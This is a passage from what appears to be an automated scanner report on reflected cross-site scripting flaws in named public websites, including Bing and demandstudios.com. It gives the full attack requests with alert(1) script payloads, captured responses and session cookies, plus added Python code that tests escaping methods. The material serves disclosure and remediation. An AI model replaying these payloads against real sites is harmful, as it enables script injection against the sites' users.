SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:18:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets74cde'-alert(1)-'f8dda444ccc/img/sprites
Content-Length: 19679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets74cde'-alert(1)-'f8dda444ccc/img/sprites';</script>
...[SNIP]...

1.386. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e81'-alert(1)-'7ae183ccf99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response, as part of the value assigned to window.CookiePath inside an inline script. The same path segment is also written, unmodified, into the path attribute of the VE_LSV Set-Cookie header, so the cookie path handling should be reviewed alongside the script reflection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/imgc0e81'-alert(1)-'7ae183ccf99/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=664a02d20838485f8faf789577ff4da5; CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100; _FS=mkt=en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 1f43e179942449ff9185ae39dd0f8b53
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/imgc0e81'-alert(1)-'7ae183ccf99/sprites
Content-Length: 19674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
llocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/imgc0e81'-alert(1)-'7ae183ccf99/sprites';</script>
...[SNIP]...

1.387. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a9bf'-alert(1)-'356075889d3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response, as part of the value assigned to window.CookiePath inside an inline script. The same path segment is also written, unmodified, into the path attribute of the VE_LSV Set-Cookie header, so the cookie path handling should be reviewed alongside the script reflection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img/sprites1a9bf'-alert(1)-'356075889d3/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=664a02d20838485f8faf789577ff4da5; CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100; _FS=mkt=en-US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 89020030055e49d19338e93e4b0ab6f5
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:18:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img/sprites1a9bf'-alert(1)-'356075889d3
Content-Length: 19679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
n=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img/sprites1a9bf'-alert(1)-'356075889d3';</script>
...[SNIP]...

1.388. http://www.bluefountainmedia.com/blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluefountainmedia.com
Path:   /blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946e6"><script>alert(1)</script>34e444257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946e6\"><script>alert(1)</script>34e444257db in the application's response: the application prefixes the double quote with a backslash, but a backslash is not an escape character inside an HTML attribute, so the quote still terminates the attribute value and the injected tags are parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input (here from /blog to /blog/, with the query string preserved). It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
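
The attribute-context reflection in finding 1.383 (parameter name echoed unmodified into a double-quoted name attribute) and in this finding (the same thing, with a backslash added before the quote) can be reproduced and checked offline. The Python below is an added example, not code from barracudanetworks.com or bluefountainmedia.com. It assumes a hypothetical handler that carries every query-string key forward as a hidden input, renders it three ways (no encoding, PHP addslashes-style backslash escaping, HTML attribute encoding) and then parses each result the way a browser tokenizer would, to see whether a script element appears.

```python
"""
Added example, not code from barracudanetworks.com or bluefountainmedia.com:
a request parameter *name* echoed into a double-quoted HTML attribute, as in
findings 1.383 (echoed unmodified) and 1.388 (echoed with a backslash before
the quote).  The handler below is hypothetical: it carries every query-string
key forward as a hidden input.  Each rendering is then parsed the way a
browser tokenizer would, to see whether a <script> element appears.
"""
import html
from html.parser import HTMLParser
from typing import Callable, Optional
from urllib.parse import parse_qsl

# Canary from finding 1.388 on this page, used as the parameter name.
PAYLOAD = '946e6"><script>alert(1)</script>34e444257db'


def addslashes(s: str) -> str:
    """PHP addslashes()/magic_quotes behaviour: prefix ' " and \\ with a backslash.
    This is the transformation visible in finding 1.388 (946e6\\"><script>...)."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def attr_encode(s: str) -> str:
    """Correct encoder for attribute context: & < > " ' become entities."""
    return html.escape(s, quote=True)


def render_hidden_inputs(query_string: str,
                         encoder: Optional[Callable[[str], str]] = None) -> str:
    """Echo every query-string key/value as a hidden input (hypothetical handler).
    encoder=None reproduces the vulnerable behaviour."""
    enc = encoder or (lambda s: s)
    return "\n".join(
        '<input type="hidden" name="%s" value="%s" />' % (enc(name), enc(value))
        for name, value in parse_qsl(query_string, keep_blank_values=True)
    )


class _TagCollector(HTMLParser):
    """Records start tags and the text inside any <script> element."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.script_text = ""
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text += data


def injected_script(markup: str) -> Optional[str]:
    """Return the body of a <script> element the markup produces, or None if
    the payload stayed inside the attribute value."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.script_text if "script" in p.tags else None


def demo() -> dict:
    """Run the canary through the three renderings.  The unencoded and the
    addslashes renderings both yield a script body; only attr_encode does not."""
    qs = PAYLOAD + "=1"
    return {
        "unencoded": injected_script(render_hidden_inputs(qs)),
        "addslashes": injected_script(render_hidden_inputs(qs, addslashes)),
        "attr_encode": injected_script(render_hidden_inputs(qs, attr_encode)),
    }


if __name__ == "__main__":
    for mode, script in demo().items():
        print("%-12s -> %s" % (mode, "script injected: %r" % script if script else "no script"))
```

The addslashes case is the one to remember: the backslash survives into the markup as an ordinary attribute character, the quote still closes the attribute, and the tokenizer emits the script element exactly as in the unencoded case. html.escape with quote=True also covers single-quoted attributes, since it converts the apostrophe as well.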

Request

GET /blog?946e6"><script>alert(1)</script>34e444257db=1 HTTP/1.1
Host: www.bluefountainmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 24 Feb 2011 20:07:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.bluefountainmedia.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <m
...[SNIP]...
<a class="prev" href="http://www.bluefountainmedia.com/blog/?946e6\"><script>alert(1)</script>34e444257db=1">
...[SNIP]...

1.389. http://www.bluefountainmedia.com/blog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluefountainmedia.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8537e"><script>alert(1)</script>f7d37bfe391 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8537e\"><script>alert(1)</script>f7d37bfe391 in the application's response. The backslash inserted before the quote is not an escape character in HTML, so the attribute value is still terminated and the injected tags are parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?8537e"><script>alert(1)</script>f7d37bfe391=1 HTTP/1.1
Host: www.bluefountainmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;

Response

HTTP/1.1 200 OK
Date: Thu, 24 Feb 2011 19:47:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.bluefountainmedia.com/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <m
...[SNIP]...
<a class="prev" href="http://www.bluefountainmedia.com/blog/?8537e\"><script>alert(1)</script>f7d37bfe391=1">
...[SNIP]...

1.390. http://www.bluefountainmedia.com/business [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluefountainmedia.com
Path:   /business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8048e"><script>alert(1)</script>308759de2c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8048e\"><script>alert(1)</script>308759de2c9 in the application's response. The backslash inserted before the quote is not an escape character in HTML, so the attribute value is still terminated and the injected tags are parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input (here from /business to /business/, with the query string preserved). It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /business?8048e"><script>alert(1)</script>308759de2c9=1 HTTP/1.1
Host: www.bluefountainmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 24 Feb 2011 20:09:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.bluefountainmedia.com/business/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <m
...[SNIP]...
<a class="prev" href="http://www.bluefountainmedia.com/business/?8048e\"><script>alert(1)</script>308759de2c9=1">
...[SNIP]...

1.391. http://www.bluefountainmedia.com/business/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluefountainmedia.com
Path:   /business/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00b"><script>alert(1)</script>6cd56da3a88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00b\"><script>alert(1)</script>6cd56da3a88 in the application's response. The backslash inserted before the quote is not an escape character in HTML, so the attribute value is still terminated and the injected tags are parsed normally.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/?2e00b"><script>alert(1)</script>6cd56da3a88=1 HTTP/1.1
Host: www.bluefountainmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=209757126.1298575694.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=k8bib9hlac8ou41qlaquip2cu0; __utma=209757126.27733805.1298575694.1298575694.1298575694.1; __utmc=209757126; __utmb=209757126.7.9.1298575709781;

Response

HTTP/1.1 200 OK
Date: Thu, 24 Feb 2011 19:47:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.bluefountainmedia.com/business/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <m
...[SNIP]...
<a class="prev" href="http://www.bluefountainmedia.com/business/?2e00b\"><script>alert(1)</script>6cd56da3a88=1">
...[SNIP]...

1.392. http://www.conduit-banners.com/drawtoolbar/ [culture parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.conduit-banners.com
Path:   /drawtoolbar/

Issue detail

The value of the culture request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5aeb'%3balert(1)//945a0b1fe9a was submitted in the culture parameter. This input was echoed as b5aeb';alert(1)//945a0b1fe9a in the application's response, the %3b having been URL-decoded to a semicolon before the value was written out. The response is a text/javascript resource whose document.write('...') call builds an <img> tag, so the reflected value sits in a JavaScript string literal that is subsequently parsed as HTML; an encoder for this location has to handle both contexts (HTML attribute encoding of the value, then JavaScript string encoding of the result).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /drawtoolbar/?ct=CT2233703&cover=0&culture=enb5aeb'%3balert(1)//945a0b1fe9a&exe=true&subdomain=hosting.conduit.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.conduit-banners.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 23 Feb 2011 22:39:59 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 14150

document.write('<img style="visibility:hidden;" src="http://usage.conduit-banners.com/Logger//?logType=impression&ctid=CT2233703&bannertypeid=1&bannerName=Toolbar_Image_cover0&bannerculture=enb5aeb';alert(1)//945a0b1fe9a&setup=true&marketingchannelname=" width="1" height="1" border="0"/>
...[SNIP]...

1.393. https://www.demandstudios.com/application.html [role parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.demandstudios.com
Path:   /application.html

Issue detail

The value of the role request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbaf0'%3balert(1)//3aa185a0bce was submitted in the role parameter. This input was echoed as dbaf0';alert(1)//3aa185a0bce in the application's response, in the assignment var desiredrole = '...'; the page script then lowercases this value and uses it to build a jQuery selector, so the parameter is consumed by page logic rather than merely displayed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
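
The single-quoted JavaScript string context described in findings 1.384 to 1.387 (window.CookiePath = '...'), 1.392 (a string inside document.write) and this finding (var desiredrole = '...') can be exercised offline with both payload shapes the scanner used. The Python below is an added example, not code from bing.com, conduit-banners.com or demandstudios.com. It assumes a hypothetical server template modelled on the window.CookiePath assignment, renders a value into it with no encoding, with backslash escaping of quotes only, and with hex escaping of every non-alphanumeric character, and uses a small JavaScript string-literal decoder to show exactly where each rendering stops being data. The third payload (PAYLOAD_CLOSE_TAG) is constructed for the example and does not appear on this page.

```python
"""
Added example, not code from bing.com, conduit-banners.com or
demandstudios.com: a request value pasted into a single-quoted JavaScript
string literal, as in findings 1.384-1.387, 1.392 and 1.393.  The renderer
below is hypothetical (modelled on window.CookiePath = '...' in 1.384).
"""

# The two payload shapes the scanner used on this page.
PAYLOAD_CONCAT = "efa53'-alert(1)-'fbcad5d3485"         # 1.384: close, concatenate, reopen
PAYLOAD_COMMENT = "Writerdbaf0';alert(1)//3aa185a0bce"  # 1.393: close, statement, comment out rest
# Constructed for this example: needs no quote at all, ends the <script> element instead.
PAYLOAD_CLOSE_TAG = "x</script><script>alert(1)</script>"


def escape_backslash_only(s: str) -> str:
    """Backslash-escape ' and \\ (addslashes-style).  Defeats the two quote
    payloads, but leaves </script> and line terminators untouched."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def js_string_escape(s: str) -> str:
    """Escape everything outside [A-Za-z0-9] as \\xHH or \\uHHHH.  No remaining
    character can close the literal, end the <script> element, or start a new line."""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def render(value: str, encoder=None) -> str:
    """Hypothetical server template; encoder=None is the vulnerable form."""
    enc = encoder or (lambda s: s)
    return "<script>window.CookiePath = '%s';</script>" % enc(value)


_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def decode_single_quoted(src: str, start: int):
    """Decode the single-quoted JS string literal opening at src[start].
    Returns (decoded_value, index just after the closing quote).  Close enough
    to the JS tokenizer to show where the literal really ends."""
    assert src[start] == "'"
    i, out = start + 1, []
    while i < len(src):
        ch = src[i]
        if ch == "'":
            return "".join(out), i + 1
        if ch in "\n\r":                       # raw line terminator: syntax error in JS
            raise SyntaxError("unterminated string literal")
        if ch == "\\":
            nxt = src[i + 1]
            if nxt == "x":
                out.append(chr(int(src[i + 2:i + 4], 16))); i += 4
            elif nxt == "u":
                out.append(chr(int(src[i + 2:i + 6], 16))); i += 6
            else:
                out.append(_SIMPLE_ESCAPES.get(nxt, nxt)); i += 2
            continue
        out.append(ch)
        i += 1
    raise SyntaxError("unterminated string literal")


def analyse(value: str, encoder=None) -> dict:
    """Render the value, decode the literal, and report what the JS engine would
    see after it.  'safe' means the decoded value round-trips, only the original
    ';</script>' follows, and no </script> occurs inside the literal (the HTML
    parser cuts the script body there before any JavaScript runs)."""
    page = render(value, encoder)
    start = page.index("'")
    decoded, end = decode_single_quoted(page, start)
    literal = page[start:end]
    closed_early = "</script" in literal.lower()
    return {
        "decoded": decoded,
        "tail": page[end:],
        "script_closed_early": closed_early,
        "safe": decoded == value and page[end:] == ";</script>" and not closed_early,
    }


if __name__ == "__main__":
    for name, enc in (("unencoded", None), ("backslash_only", escape_backslash_only),
                      ("js_string_escape", js_string_escape)):
        for payload in (PAYLOAD_CONCAT, PAYLOAD_COMMENT, PAYLOAD_CLOSE_TAG):
            r = analyse(payload, enc)
            print("%-16s safe=%-5s decoded=%r tail=%r" % (name, r["safe"], r["decoded"], r["tail"]))
```

With no encoding the literal ends at the payload's own quote and everything after it (-alert(1)-'... or ;alert(1)//...) is executed as code. Backslash escaping closes that gap but not the one the HTML parser opens: a </script> inside the literal ends the script element regardless of JavaScript string state. Escaping every non-alphanumeric character as \xHH handles quotes, backslashes, angle brackets and line terminators at once, which is why it is the usual recommendation for this context. For finding 1.392 the string is additionally written out as HTML by document.write, so the value would be HTML-attribute encoded first and then passed through js_string_escape.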

Request

GET /application.html?role=Writerdbaf0'%3balert(1)//3aa185a0bce&utm_source=DemandMedia&utm_medium=site&utm_campaign=writer HTTP/1.1
Host: www.demandstudios.com
Connection: keep-alive
Referer: http://www.demandmedia.com/studios/writers/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Feb 2011 22:40:49 GMT
Server: Microsoft-IIS/6.0
Hostname: sjl01wdsweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: BIGipServerdemandstudios.com-69.64.153.116-80=546703626.20480.0000; path=/ ; domain=demandstudios.com; path=/
Set-Cookie: ASP.NET_SessionId=2y4b1ajzmpsrov55jqx00455; path=/; HttpOnly
Set-Cookie: DemandStudiosContributorApplication=utm_source=DemandMedia&utm_medium=site&utm_campaign=writer&url_referrer=http://www.demandmedia.com/studios/writers/&migration_group=; expires=Sun, 27-Mar-2011 21:40:49 GMT; path=/
Cache-Control: private
Expires: Fri, 25 Feb 2011 22:40:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 74148


<!doctype html>
<html lang="en-US">

<head>
   <title>Demand Media Studios Application for Writers, Copy Editors, Filmmakers &amp; Other Freelance Jobs | Demand Media Studios</title>
   <meta cha
...[SNIP]...
new Application({
    tooltipTarget: $('#application .wrapper'),
    form: $('#writerApp')
    });

    // console.log(application);
    var desiredrole = 'Writerdbaf0';alert(1)//3aa185a0bce';

    // attach role qualification switches

    var desiredroleclean = '#' + desiredrole.toLowerCase() + 'Role';
    $(desiredroleclean).attr('checked', 'checked');

    a
...[SNIP]...

1.394. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dyn-web.com
Path:   /bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36e73"><a>9552f5671b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response, which is the site's 404 Not Found page writing the requested path back into the href attribute of a link.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bus36e73"><a>9552f5671b8/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 23:08:57 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=b12b1ebc7d2fec9ac1c120a931ce8ab5; path=/
Connection: close
Content-Type: text/html
Content-Length: 5460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a href="/bus36e73"><a>9552f5671b8/">
...[SNIP]...

1.395. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

